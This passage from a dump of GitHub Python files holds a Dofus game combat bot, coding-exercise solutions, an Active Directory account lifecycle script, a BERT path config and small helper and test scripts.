alea=False, pause=pause)\n                    divers.move_mouse(72, 146, 130, 450, Click=0, vitesse=3, alea=False, pause=pause)\n                obst = obstacle(origine)\n                # divers.move_mouse(70, 475, 100, 230, vitesse = 2, pause= pause)\n\n                pos_perso = findperso(cra[0], cra[1], cra[2])\n                if pos_perso == None:\n                    pos_perso = findperso(cra[0], cra[1], cra[2])\n\n                pos_ennemi = findperso(creature[0], creature[1], creature[2])\n                if pos_ennemi == None:\n                    pos_ennemi = findperso(creature[0], creature[1], creature[2])\n                if pos_ennemi == None:\n                    break\n                pos_perso = (pos_perso[0]+2, pos_perso[1] + 19)\n                pos_ennemi = (pos_ennemi[0]+2, pos_ennemi[1] + 19)\n                pos_perso = pos_abs_2_rel(pos_perso, origine)\n                pos_ennemi = pos_abs_2_rel(pos_ennemi, origine)\n\n                dist = abs(pos_perso[0]-pos_ennemi[0]) + abs(pos_perso[1]-pos_ennemi[1])\n                # if too far, get closer\n                if dist > PO_Sort:\n                    # cancel the spell click so we can move\n                    if bool_sort:\n                        bool_sort = False\n                        divers.move_mouse(72, 146, 130, 450, vitesse=2, pause= pause)\n                    path = findpath(obst, pos_perso, pos_ennemi)\n                    if len(path) < pm:\n                        pm = len(path)\n                    Go_to = pos_rel_2_abs(path[len(path)-pm], origine)\n                    divers.move_mouse(Go_to[0]-6, Go_to[1]-4, 6, 6, vitesse=2, pause=pause)\n                    pos_perso = path[len(path)-pm]\n                    dist = abs(pos_perso[0]-pos_ennemi[0]) + abs(pos_perso[1]-pos_ennemi[1])\n\n                if dist <= PO_Sort:\n                    if ligne_de_vue(obst, pos_perso, pos_ennemi):\n                        Go_to = pos_rel_2_abs(pos_ennemi, origine)\n\n                        divers.move_mouse(Sort_Avec_Vue[0], Sort_Avec_Vue[1], 13, 14, alea=False, vitesse=2, pause=pause)\n                        divers.move_mouse(Go_to[0]-6, Go_to[1]-4, 9, 6, alea=False, vitesse=2, pause=pause)\n\n                        time.sleep(0.3 + random.random() * 0.3)\n                        if combat_fini()[0] == 1:\n                            bool_fini = combat_fini()\n                            break\n\n                        divers.move_mouse(Sort_Avec_Vue[0], Sort_Avec_Vue[1], 13, 14, alea=False, vitesse=2, pause=pause)\n                        if combat_fini()[0] == 1:\n                            bool_fini = combat_fini()\n                            break\n                        divers.move_mouse(Go_to[0]-6, Go_to[1]-4, 9, 6, vitesse=2, pause= pause)\n                    # Spell with line of sight\n                    # Second cast of the line-of-sight spell\n                    else:\n                        Go_to = pos_rel_2_abs(pos_ennemi,origine)\n                        if (not(bool_sort)):\n                            divers.move_mouse(Sort_Sans_Vue[0], Sort_Sans_Vue[1], 13, 14,alea=False, vitesse=2, pause= pause)\n                        divers.move_mouse(Go_to[0]-6, Go_to[1]-4, 9, 6, alea=False, vitesse=2, pause=pause)\n\n                        time.sleep(0.3 + random.random() * 0.3)\n                        if combat_fini()[0] == 1:\n                            bool_fini = combat_fini()\n                            break\n\n                        divers.move_mouse(Sort_Sans_Vue[0], Sort_Sans_Vue[1], 13, 14, alea=False, vitesse=2, pause=pause)\n                        if combat_fini()[0] == 1:\n                            bool_fini = combat_fini()\n                            break\n                        divers.move_mouse(Go_to[0]-6, Go_to[1]-4, 9, 6, vitesse=2, pause=pause)\n\n        time.sleep(0.3 + random.random() * 0.3)\n        divers.move_mouse(bool_fini[1], bool_fini[2], 60, 10, alea=False, pause=pause)\n    except:\n        return\n\n","repo_name":"bebeh3176/Farming_sim","sub_path":"BOT_Dofus/Divers/Combat.py","file_name":"Combat.py","file_ext":"py","file_size_in_byte":14065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34621481689","text":"# prompts the user for the name of a variable in camel case\ncamel_text = input(\"camelCase: \").strip()\n\n# assign the first char of the camel case\nsnake_text = camel_text[0]\n\n# check the first letter in input\nfor char in camel_text[1:]:\n    # check if first letter is upper\n    if char.isupper():\n        # add \"_\" at the beginning of the uppercase char then make it lowercase\n        snake_text += \"_\" + char.lower()\n    else:\n        snake_text += char.lower()\n# outputs the corresponding name in snake case.\nprint(f\"snake_case: 
{snake_text}\")","repo_name":"patricktenorio/CS50P_complete_course","sub_path":"week_2/camel/camel.py","file_name":"camel.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"7699722188","text":"from collections import deque\nfrom typing import List\n\nclass Solution:\n    def permute(self, nums: List[int]) -> List[List[int]]:\n        \n        # []\n        # [1]\n        # [1,2], [2,1]\n        # [3,1,2], [1,3,2], [1,2,3], [3,2,1], [2,3,1], [2,1,3]\n        \n        res = [] # [3,2,1], [2,3,1], [2,1,3]\n        que = deque([])\n        que += [],\n        \n        for num in nums: #3\n            n = len(que) # 2, [2,1] [1,2]\n            for _ in range(n): # 2\n                oldPerm = que.popleft() # [2,1]\n                for i in range(len(oldPerm)+1): # 0,1,2\n                    newPerm = oldPerm[:] # [2,1]\n                    newPerm.insert(i, num) # \n                    if len(newPerm) == len(nums):\n                        res += newPerm,\n                    else:\n                        que += newPerm, # []\n        \n        return res\n\n# Second attempt\n\nfrom collections import deque\n\nclass Solution:\n    def permute(self, nums: List[int]) -> List[List[int]]:\n        # use bit manipulation\n        # use bfs method \n        \n        # BFS method\n        # when len == 3: add to res\n        # [] -> [1] -> [2,1] [1,2] -> [3,2,1], [2,3,1], [2,1,3], [3,1,2], [1,3,2], [1,2,3]\n        \n        que = deque([[]])\n        res = []\n        idx = 0\n        while len(que):\n            # print(que)\n            for x in range(len(que)): # 1\n                temp = que.popleft() # [1]\n                # print(\"temp\", temp)\n                if len(temp) == len(nums):\n                    res += temp,\n                    break\n\n                for i in range(len(temp)+1): # 2\n                    newList = temp[:i] + [nums[idx]] + temp[i:]\n                    # print(newList)\n                    que += newList,\n\n            idx+=1\n        \n        return res","repo_name":"DarshanGowda0/LC-Grind","sub_path":"Daily-Grind/56.py","file_name":"56.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27192554420","text":"import logging\nimport typing\nimport uuid\nfrom functools import lru_cache\nfrom functools import partial\nfrom functools import wraps\nfrom operator import itemgetter\nfrom typing import Any\nfrom typing import Callable\nfrom typing import Dict\nfrom typing import Iterator\nfrom typing import List\nfrom typing import Optional\nfrom typing import Tuple\n\nimport click\nimport sentry_sdk\nfrom ra_utils.apply import apply\nfrom ra_utils.catchtime import catchtime\nfrom ra_utils.jinja_filter import create_filters\nfrom ra_utils.lazy_dict import LazyDict\nfrom ra_utils.lazy_dict import LazyEval\nfrom ra_utils.lazy_dict import LazyEvalBare\nfrom ra_utils.load_settings import load_settings\nfrom ra_utils.tqdm_wrapper import tqdm\n\nfrom .ad_exceptions import NoActiveEngagementsException\nfrom .ad_exceptions import NoPrimaryEngagementException\nfrom .ad_logger import start_logging\nfrom .ad_reader import ADParameterReader\nfrom .ad_writer import ADWriter\nfrom .read_ad_conf_settings import injected_settings\nfrom exporters.sql_export.gql_lora_cache_async import GQLLoraCache\nfrom exporters.sql_export.lora_cache import get_cache as LoraCache\nfrom exporters.sql_export.old_lora_cache import OldLoraCache\n\nlogger = logging.getLogger(\"CreateAdUsers\")\nexport_logger = logging.getLogger(\"export\")\n\nFilterFunction = Callable[[Tuple[Dict, Dict]], bool]\n\n\nclass AdLifeCycle:\n    def __init__(\n        self, read_from_cache: bool = True, skip_occupied_names_check: bool = False\n    ) -> None:\n        logger.info(\"AD Sync Started\")\n        self._settings = self._load_settings()\n\n        self.roots = self._settings[\"integrations.ad.write.create_user_trees\"]\n\n        self.stats = self._gen_stats()\n\n        self.create_filters = 
self._load_jinja_filters(\"create_filters\")\n        self.disable_filters = self._load_jinja_filters(\"disable_filters\")\n\n        self.ad_reader = self._get_adreader()\n\n        # This is a potentially slow step (since it may read LoraCache)\n        print(\"Retrieve LoRa dump\")\n        with catchtime() as t:\n            self.lc, self.lc_historic = self._update_lora_cache(dry_run=read_from_cache)\n        print(\"Done with LoRa caching: {}\".format(t()))\n\n        # Create a set of users with engagements for faster filtering\n        engagements = self.lc_historic.engagements.values()\n        self.users_with_engagements = set(map(lambda eng: eng[0][\"user\"], engagements))\n\n        print(\"Retrieve AD Writer name list\")\n        with catchtime() as t:\n            self.ad_writer = self._get_adwriter(\n                lc=self.lc,\n                lc_historic=self.lc_historic,\n                skip_occupied_names=skip_occupied_names_check,\n                all_settings=injected_settings(\"ad_lifecycle_injected_settings\"),\n            )\n        print(\"Done with AD Writer init: {}\".format(t()))\n\n        logger.debug(\"__init__() done\")\n\n    def _load_settings(self):\n        return load_settings()\n\n    def _load_jinja_filters(self, source: str) -> List[Callable]:\n        seeded_create_filters = partial(\n            create_filters, tuple_keys=(\"employee\", \"ad_object\")\n        )\n        setting_name = f\"integrations.ad.lifecycle.{source}\"\n        filter_templates = self._settings.get(setting_name, [])\n        return [\n            # Decorate each `filter_func` so it will log skipped users under\n            # a name such as \"create_filters_num_0\", etc.\n            self.log_skipped(f\"{source}_num_{num}\")(filter_func)\n            for num, filter_func in enumerate(seeded_create_filters(filter_templates))\n        ]\n\n    def _get_adreader(self):\n        reader = ADParameterReader()\n        reader.cache_all(print_progress=True)\n        return reader\n\n    def _get_adwriter(self, **kwargs):\n        return ADWriter(**kwargs)\n\n    def log_skipped(self, filtername):\n        \"\"\"Return decorated version of a filter function taking a single\n        `tup` arg, which is an `(employee, ad_object)` tuple.\n        If the filter function returns `False`, store the result in the\n        `stats[\"skipped\"][filtername]` dictionary by the employee UUID.\n        \"\"\"\n\n        def get_employee_name(employee):\n            if \"name\" in employee:\n                return \" \".join(employee[\"name\"])\n            elif \"navn\" in employee:\n                return employee[\"navn\"]\n            else:\n                return \"unknown\"\n\n        def decorator(f):\n            @wraps(f)\n            def wrapper(tup):\n                # Call the filter function saving its status\n                status = f(tup)\n                if status is False:\n                    skipped = self.stats.setdefault(\"skipped\", {})\n                    users = skipped.setdefault(filtername, {})\n                    # Add user UUID to dictionary (name is used for the value)\n                    employee = tup[0]\n                    users[employee[\"uuid\"]] = get_employee_name(employee)\n                return status\n\n            return wrapper\n\n        return decorator\n\n    def _update_lora_cache(\n        self, dry_run: bool = True\n    ) -> Tuple[\n        typing.Union[OldLoraCache, GQLLoraCache],\n        typing.Union[OldLoraCache, GQLLoraCache],\n    ]:\n        \"\"\"\n        Read all information from AD and LoRa.\n        :param dry_run: If True, LoRa dump will be read from cache.\n        \"\"\"\n        lc = LoraCache(resolve_dar=True, full_history=False)\n        lc.populate_cache(dry_run=dry_run, skip_associations=True)\n        lc.calculate_derived_unit_data()\n        lc.calculate_primary_engagements()\n\n        lc_historic = LoraCache(resolve_dar=True, full_history=True, skip_past=True)\n        lc_historic.populate_cache(dry_run=dry_run, skip_associations=True)\n\n        return lc, lc_historic\n\n    def _gen_stats(self) -> Dict[str, Any]:\n        return {\n            \"critical_errors\": 0,\n            \"engagement_not_found\": 0,\n            \"created_users\": 0,\n            \"disabled_users\": 0,\n            \"already_in_ad\": 0,\n            \"no_active_engagements\": 0,\n            \"not_in_user_tree\": 0,\n            \"create_filtered\": 0,\n            \"users\": set(),\n        }\n\n    @apply\n    def _find_user_unit_tree(self, user: dict, ad_object: dict) -> bool:\n        try:\n            (\n                employment_number,\n                title,\n                eng_org_unit_uuid,\n                eng_uuid,\n            ) = self.ad_writer.datasource.find_primary_engagement(user[\"uuid\"])\n        except (NoActiveEngagementsException, NoPrimaryEngagementException):\n            logger.warning(\n                \"Warning: Unable to find primary for {}!\".format(user[\"uuid\"])\n            )\n            return False\n\n        logger.debug(\"Primary found, now find org unit location\")\n\n        try:\n            unit = self.lc.units[eng_org_unit_uuid][0]\n        except KeyError:\n            logger.warning(\n                \"cannot find unit %r (user=%r)\", eng_org_unit_uuid, user[\"uuid\"]\n            )\n            return False\n\n        # Walk up the organisation unit tree, starting at `unit[\"parent\"]`.\n        # Stop when we find an allowed root node, or if we encounter a node\n        # without a parent (must be root?)\n        looking = True\n        while looking:\n            if unit[\"uuid\"] in self.roots:\n                return True\n            if unit[\"parent\"] is None:\n                return False\n\n            if unit[\"parent\"] in self.lc.units:\n                unit = self.lc.units[unit[\"parent\"]][0]\n            else:\n                logger.warning(\n                    \"cannot find parent unit %r (user=%r)\", unit[\"parent\"], user[\"uuid\"]\n                )\n                looking = False\n\n        return False\n\n    def _get_filter_users_outside_unit_tree(self):\n        \"\"\"Return predicate which filters MO users outside the specified unit tree (aka.\n        \"user_trees\".)\n        \"\"\"\n\n        @self.log_skipped(\"filter_users_outside_unit_tree\")\n        def filter_users_outside_unit_tree(tup):\n            status = self._find_user_unit_tree(tup)\n            if status is False:\n                self.stats[\"not_in_user_tree\"] += 1\n            return status\n\n        return filter_users_outside_unit_tree\n\n    def _gen_filtered_employees(\n        self, in_filters: Optional[List[FilterFunction]] = None\n    ):\n        def enrich_with_ad_user(mo_employee: dict) -> Tuple[Dict, Dict]:\n            \"\"\"Enrich mo_employee with AD employee dictionary.\"\"\"\n            cpr = mo_employee[\"cpr\"]\n            ad_object = self.ad_reader.read_user(cpr=cpr, cache_only=True)\n            return mo_employee, ad_object\n\n        @lru_cache(maxsize=None)\n        def get_engagements() -> List[LazyDict]:\n            \"\"\"Produce a list of engagements with lazily evaluated properties.\"\"\"\n\n            def make_class_lazy(class_attribute: str, mo_engagement: dict) -> dict:\n                \"\"\"Create a lazily evaluated class property.\"\"\"\n                class_uuid = mo_engagement[class_attribute]\n                mo_engagement[class_attribute + \"_uuid\"] = class_uuid\n                mo_engagement[class_attribute] = LazyEvalBare(\n                    lambda: {\n                        **self.lc.classes[class_uuid],\n                        \"uuid\": class_uuid,\n                    }\n                )\n                return mo_engagement\n\n            lc_engagements: List[\n                List[Dict]\n            ] = self.lc.engagements.values()  # type:ignore\n            engagements: Iterator[Dict] = map(itemgetter(0), lc_engagements)\n            lazy_engagements: Iterator[LazyDict] = map(LazyDict, engagements)\n            enriched_engagements: Iterator[LazyDict] = map(\n                # Enrich engagement_type class\n                partial(make_class_lazy, \"engagement_type\"),\n                map(\n                    # Enrich primary_type class\n                    partial(make_class_lazy, \"primary_type\"),\n                    map(\n                        # Enrich job_function class\n                        partial(make_class_lazy, \"job_function\"),\n                        lazy_engagements,\n                    ),\n                ),\n            )\n            return list(enriched_engagements)\n\n        def enrich_with_engagements(mo_employee: dict) -> LazyDict:\n            \"\"\"Enrich mo_employee with lazy engagement information.\n\n            The list of engagements is itself lazy, so this code is essentially free\n            when it is not in use.\n            \"\"\"\n            # Turn mo_employee into a lazy dict and add lazy properties\n            lazy_employee: LazyDict = LazyDict(mo_employee)\n\n            lazy_employee[\"engagements\"] = LazyEvalBare(\n                lambda: list(\n                    filter(\n                        lambda engagement: engagement[\"user\"] == mo_employee[\"uuid\"],\n                        get_engagements(),\n                    )\n                )\n            )\n\n            lazy_employee[\"primary_engagement\"] = LazyEval(\n                lambda key, dictionary: next(\n                    filter(\n                        lambda engagement: engagement.get(\"primary_boolean\", False),\n                        dictionary[\"engagements\"],\n                    ),\n                    None,\n                )\n            )\n\n            return lazy_employee\n\n        filters: List[FilterFunction] = in_filters or []\n\n        lc_employees: List[List[Dict]] = self.lc.users.values()  # type:ignore\n        nonempty_employees = filter(lambda val: len(val) > 0, lc_employees)\n        tqdm_employees: List[List[Dict]] = tqdm(nonempty_employees)\n        # From employee_effects --> employees\n        employees: Iterator[Dict] = map(itemgetter(0), tqdm_employees)\n\n        # Enrich with engagements\n        ee_employees: Iterator[Dict] = map(enrich_with_engagements, employees)\n\n        # Enrich with ad_objects\n        ad_employees: Iterator[Tuple[Dict, Dict]] = map(\n            enrich_with_ad_user, ee_employees\n        )\n\n        # Apply requested filters\n        for filter_func in filters:\n            ad_employees = filter(filter_func, ad_employees)\n        return ad_employees\n\n    def disable_ad_accounts(self, dry_run: bool = False) -> Dict[str, Any]:\n        \"\"\"Iterate over all users and disable non-active AD accounts.\"\"\"\n\n        @apply\n        def filter_user_not_in_ad(employee: dict, ad_object: dict) -> bool:\n            in_ad = bool(ad_object)\n            if not in_ad:\n                logger.debug(\"User {} does not have an AD account\".format(employee))\n                return False\n            return True\n\n        @apply\n        def filter_user_has_engagements(employee: dict, ad_object: dict) -> bool:\n            # Check the user does not have a valid engagement:\n            # TODO: Consider using the lazy properties for this\n            if employee[\"uuid\"] in self.users_with_engagements:\n                logger.debug(\"User {} is active - do not touch\".format(employee))\n                return False\n            return True\n\n        employees = self._gen_filtered_employees(\n            [\n                # Remove users that do not exist in AD\n                filter_user_not_in_ad,\n                # Remove users that have active engagements\n                filter_user_has_engagements,\n                # Remove users outside the unit tree\n                self._get_filter_users_outside_unit_tree(),\n            ]\n            + self.disable_filters\n        )\n        # Employees now contain only employees which should be disabled\n        for employee, ad_object in employees:\n            logger.debug(\"This user has no active engagements, we should disable\")\n            # This user has an AD account, but no engagements - disable\n            sam = ad_object[\"SamAccountName\"]\n            status = True\n            message = \"dry-run\"\n            if not dry_run:\n                status, message = self.ad_writer.enable_user(username=sam, enable=False)\n            if status:\n                logger.debug(\"Disabled: {}\".format(sam))\n                self.stats[\"disabled_users\"] += 1\n                self.stats[\"users\"].add(employee[\"uuid\"])\n            else:\n                logger.warning(\"enable_user call failed!\")\n                logger.warning(message)\n                self.stats[\"critical_errors\"] += 1\n\n        return self.stats\n\n    def create_ad_accounts(self, dry_run: bool = False) -> Dict[str, Any]:\n        \"\"\"Iterate over all users and create missing AD accounts.\"\"\"\n\n        @self.log_skipped(\"filter_user_already_in_ad\")\n        @apply\n        def filter_user_already_in_ad(employee, ad_object):\n            in_ad = bool(ad_object)\n            if in_ad:\n                self.stats[\"already_in_ad\"] += 1\n                logger.debug(\"User {} is already in AD\".format(employee))\n                return False\n            return True\n\n        @self.log_skipped(\"filter_user_without_engagements\")\n        @apply\n        def filter_user_without_engagements(employee, ad_object):\n            # TODO: Consider using the lazy properties for this\n            if employee[\"uuid\"] not in self.users_with_engagements:\n                self.stats[\"no_active_engagements\"] += 1\n                logger.debug(\n                    \"User {} has no active engagements - skip\".format(employee)\n                )\n                return False\n            return True\n\n        def run_create_filters(tup):\n            status = all(create_filter(tup) for create_filter in self.create_filters)\n            if status is False:\n                self.stats[\"create_filtered\"] += 1\n            return status\n\n        employees = self._gen_filtered_employees(\n            [\n                # Remove users that already exist in AD\n                filter_user_already_in_ad,\n                # Remove users that have no active engagements at all\n                filter_user_without_engagements,\n                # Check if the user is in a create-user sub-tree\n                self._get_filter_users_outside_unit_tree(),\n                # Run all create_filters\n                run_create_filters,\n            ]\n        )\n        # Employees now contain only employees which should be created\n        for employee, ad_object in employees:\n            logger.debug(\"Create account for {}\".format(employee))\n            try:\n                # Create user without manager to avoid risk of failing\n                # if manager is not yet in AD. The manager will be attached\n                # by the next round of sync.\n                status = True\n                message = \"dry-run\"\n                status, message = self.ad_writer.create_user(\n                    employee[\"uuid\"], create_manager=False, dry_run=dry_run\n                )\n                if status:\n                    logger.debug(\"New username: {}\".format(message))\n                    self.stats[\"created_users\"] += 1\n                    self.stats[\"users\"].add(employee[\"uuid\"])\n                else:\n                    logger.warning(\"create_user call failed!\")\n                    logger.warning(message)\n                    self.stats[\"critical_errors\"] += 1\n            except NoPrimaryEngagementException:\n                logger.exception(\"No engagement found!\")\n                self.stats[\"engagement_not_found\"] += 1\n            except Exception as e:\n                logger.exception(\"Unknown error!\")\n                export_logger.error(\n                    \"Error creating AD user for MO user %r: %r\",\n                    employee[\"uuid\"],\n                    e,\n                )\n                self.stats[\"critical_errors\"] += 1\n\n        return self.stats\n\n\ndef write_stats(stats: Dict[str, Any]) -> None:\n    logger.info(\"Stats: {}\".format(stats))\n    stats[\"users\"] = \"Written in log file\"\n    print(stats)\n\n\ndef run_preview_command_for_uuid(sync: AdLifeCycle, mo_uuid: str):\n    commands = sync.ad_writer._preview_create_command(\n        mo_uuid, ad_dump=None, create_manager=False\n    )\n    for cmd in commands:\n        click.echo_via_pager(cmd)\n    return commands\n\n\n@click.command()\n@click.option(\n    \"--create-ad-accounts\",\n    default=False,\n    is_flag=True,\n    help=\"Create AD Users.\",\n    type=click.BOOL,\n)\n@click.option(\n    \"--disable-ad-accounts\",\n    default=False,\n    is_flag=True,\n    help=\"Disable AD Users.\",\n    type=click.BOOL,\n)\n@click.option(\n    \"--dry-run\",\n    default=False,\n    is_flag=True,\n    help=\"Dry-run without changes.\",\n    type=click.BOOL,\n)\n@click.option(\"--read-from-cache\", is_flag=True, envvar=\"USE_CACHED_LORACACHE\")\n@click.option(\n    \"--skip-occupied-names-check\",\n    default=False,\n    is_flag=True,\n    help=\"Skip reading all current user names from AD. 
Only for testing!\",\n type=click.BOOL,\n)\n@click.option(\n \"--preview-command-for-uuid\",\n help=\"Given a MO user UUID, preview the PowerShell command to be run\",\n type=click.STRING,\n)\ndef ad_life_cycle(\n create_ad_accounts: bool,\n disable_ad_accounts: bool,\n dry_run: bool,\n read_from_cache: bool,\n skip_occupied_names_check: bool,\n preview_command_for_uuid: Optional[uuid.UUID],\n) -> None:\n \"\"\"Create or disable users.\"\"\"\n logger.debug(\n \"Running ad_life_cycle with: {}\".format(\n {\n \"create_ad_accounts\": create_ad_accounts,\n \"disable_ad_accounts\": disable_ad_accounts,\n \"dry_run\": dry_run,\n \"read_from_cache\": read_from_cache,\n }\n )\n )\n\n sync = AdLifeCycle(\n read_from_cache=read_from_cache,\n skip_occupied_names_check=skip_occupied_names_check,\n )\n\n if \"crontab.SENTRY_DSN\" in sync._settings:\n sentry_sdk.init(dsn=sync._settings[\"crontab.SENTRY_DSN\"])\n\n if preview_command_for_uuid:\n run_preview_command_for_uuid(sync, str(preview_command_for_uuid))\n return\n\n if not any([create_ad_accounts, disable_ad_accounts]):\n raise click.ClickException(\n \"Either create_ad_accounts or disable_ad_accounts must be given!\"\n )\n\n if create_ad_accounts:\n stats = sync.create_ad_accounts(dry_run)\n write_stats(stats)\n\n if disable_ad_accounts:\n stats = sync.disable_ad_accounts(dry_run)\n write_stats(stats)\n\n\nif __name__ == \"__main__\":\n start_logging(export_log_file=\"AD_life_cycle.log\")\n ad_life_cycle()\n","repo_name":"OS2mo/os2mo-data-import-and-export","sub_path":"integrations/ad_integration/ad_life_cycle.py","file_name":"ad_life_cycle.py","file_ext":"py","file_size_in_byte":20093,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"43860690007","text":"def parse_input(input_lines):\n program = []\n for line in input_lines:\n instruction = line.split()\n if len(instruction) == 2:\n instruction[1] = int(instruction[1])\n program.append(instruction)\n return program\n\ndef simulate(program, callback):\n regValue = 1\n cycle = 0\n for instruction in program:\n cmd = instruction[0]\n if cmd == \"noop\":\n cycle += 1\n callback(cycle, regValue)\n else: #addx\n callback(cycle + 1, regValue)\n cycle += 2\n callback(cycle, regValue)\n regValue += instruction[1]\n\ndef part1(input_lines):\n program = parse_input(input_lines)\n values = []\n def callback(cycle, regValue):\n if cycle % 40 == 20:\n values.append(cycle * regValue)\n simulate(program, callback)\n return sum(values)\n\ndef part2(input_lines):\n program = parse_input(input_lines)\n image = '' \n def callback(cycle, regValue):\n nonlocal image\n horizontalPos = (cycle-1) % 40\n if horizontalPos >= regValue - 1 and horizontalPos <= regValue + 1:\n pixel = '#'\n else:\n pixel = '.'\n image += pixel\n if horizontalPos == 39:\n image += '\\n'\n simulate(program, callback)\n return image\n\nexample_image=\\\n'##..##..##..##..##..##..##..##..##..##..\\n' +\\\n'###...###...###...###...###...###...###.\\n' +\\\n'####....####....####....####....####....\\n' +\\\n'#####.....#####.....#####.....#####.....\\n' +\\\n'######......######......######......####\\n' +\\\n'#######.......#######.......#######.....\\n'\n\nexample_answers = [13140, example_image]","repo_name":"TurboErbo/AdventOfCode","sub_path":"2022/10.py","file_name":"10.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15276373500","text":"#!/usr/bin/env python\r\n# -*- coding: 
utf-8 -*-\r\n# @File : path.py\r\n# @Author: Zhan\r\n# @Date : 7/18/2019\r\n# @Desc : Paths for the data, model, vocabulary and other files\r\n\r\nimport sys\r\nimport os\r\n\r\nfrom bert import modeling\r\n\r\nfrom flyai.utils import remote_helper\r\n\r\ncPath = os.getcwd()\r\n# Path of the training data\r\nDATA_PATH = os.path.join(cPath, 'data', 'input')\r\n# Path where the model is saved\r\nMODEL_PATH = os.path.join(cPath, 'data', 'output', 'model')\r\n# Output path for the training logs\r\nLOG_PATH = os.path.join(cPath, 'data', 'output', 'logs')\r\n\r\n# The model must be downloaded with this method before it can be loaded\r\nBERT_PATH = os.path.dirname(remote_helper.get_remote_date(\"https://www.flyai.com/m/chinese_L-12_H-768_A-12.zip\"))\r\nBERT_PATH = os.path.join(BERT_PATH, 'chinese_L-12_H-768_A-12')\r\nprint('BERT_PATH:{}'.format(BERT_PATH))\r\n# BERT_PATH = r'D:\\jack_doc\\python_src\\flyai\\chinese_L-12_H-768_A-12'\r\nBERT_CONFIG = modeling.BertConfig.from_json_file(os.path.join(BERT_PATH,\"bert_config.json\"))\r\nBERT_CKPT = os.path.join(BERT_PATH,'bert_model.ckpt')\r\nVOCAB_FILE=os.path.join(BERT_PATH,\"vocab.txt\")\r\n\r\n\r\nTENSORFLOW_MODEL_DIR = \"dpNet.ckpt\"","repo_name":"passionzhan/flyai_contest","sub_path":"spamMessage_bert/path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"3015757088","text":"# https://programmers.co.kr/learn/courses/30/lessons/42626\nimport heapq\n\ndef solution(scoville, K):\n    heapq.heapify(scoville)\n    count = 0\n    while True:\n        first = heapq.heappop(scoville)\n        if len(scoville) == 0 and first < K:\n            return -1\n        elif first >= K:\n            return count\n        else:\n            second = heapq.heappop(scoville)\n            new = first + 2*second\n            heapq.heappush(scoville, new)\n            count += 1\n","repo_name":"hongminpark/prgrms-algorithms","sub_path":"heap/lv2_더맵게.py","file_name":"lv2_더맵게.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4974916366","text":"import os, sys\nimport socket\ndef getLocalIP():\n    # s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n    # s.connect(('localhost', 80))\n    # print (s.getsockname())\n    # s.close()\n    if os.name == 'nt':\n        a = socket.getaddrinfo(socket.gethostname(), None, 2, 1, 0)\n        print (a)\n\n\ngetLocalIP()\nsys.exit()\n\nfrom functions_s import _PLATFORM, _ROOT_DIR, info_from_db\n\n\nprint(_PLATFORM)\nprint (_ROOT_DIR)\nprint(info_from_db(title=\"startBI\", type=\"txt\"))\nsys.exit()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nabsdir = os.path.dirname(os.path.abspath(sys.argv[0]))\nos.chdir(absdir)\nrootdir = os.path.dirname(absdir)\n\n\ndef getServiceSt():\n    print (os.getcwd())\n    if os.name == 'posix':\n        arr_rs = {\n            \"mysqld\" :{\"status\":\"stopped\",\"path\":\"wrong\", 
\"code\":0},\n \"nginx\" :{\"status\":\"stopped\",\"path\":\"wrong\", \"code\":0},\n \"php-cgi\":{\"status\":\"stopped\",\"path\":\"wrong\", \"code\":0},\n \"startbi\":{\"status\":\"stopped\",\"path\":\"wrong\", \"code\":0},\n }\n\n cmd_str = \"\"\"wmic process where \"name='mysqld.exe' or name='php-cgi.exe' or name='nginx.exe' or commandline='python3.exe startBI.py'\" get caption, commandline, executablePath\"\"\"\n for line in str(os.popen(cmd_str).read()).splitlines():\n line = line.lower().strip()\n if not line:\n continue\n for rs in arr_rs:\n if line.lower().find(rs) >= 0 :\n arr_rs[rs]['status'] = \"running\"\n tabs = line.split(\" \")\n arr_rs[rs]['path'] = os.path.dirname(tabs[-1])\n arr_rs[rs]['code'] = 1 if arr_rs[rs]['path'].find(rootdir) >=0 else -1\n\n return arr_rs\n\nx = getServiceSt()\n\nprint(x)\n\n# from init_db import init_db_main\n\n\n# init_db_main()","repo_name":"hanskimvz/Cosilan","sub_path":"bin/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14963179576","text":"from day7.Day7 import *\n\n\ndef test_find_possible_outer_bags():\n rules = {'vibrant bronze bag': [InnerBag(3, 'dim olive bag')],\n 'shiny teal bag': [InnerBag(1, 'posh green bag'),\n InnerBag(5, 'pale indigo bag'),\n InnerBag(1, 'mirrored purple bag')]}\n\n result = find_possible_outer_bags('pale indigo bag', rules)\n\n assert result == ['shiny teal bag']\n\n\ndef test_can_contain_target__false():\n rules = {'vibrant bronze bag': [InnerBag(3, 'dim olive bag')]}\n\n result = can_contain_target('vibrant bronze bag', 'shiny olive bag', rules)\n\n assert result is False\n\n\ndef test_can_contain_target__directly_contained():\n rules = {'vibrant bronze bag': [InnerBag(3, 'dim olive bag')]}\n\n result = can_contain_target('vibrant bronze bag', 'dim olive bag', rules)\n\n assert result is True\n\n\ndef test_can_contain_target__indirectly_contained():\n rules = {'vibrant bronze bag': [InnerBag(3, 'shiny teal bag')],\n 'shiny teal bag': [InnerBag(1, 'posh green bag'),\n InnerBag(5, 'pale indigo bag'),\n InnerBag(1, 'mirrored purple bag')]}\n\n result = can_contain_target('vibrant bronze bag', 'pale indigo bag', rules)\n\n assert result is True\n\n\ndef test_count_contained_bags():\n rules = {'vibrant bronze bag': [InnerBag(3, 'shiny teal bag')],\n 'shiny teal bag': [InnerBag(1, 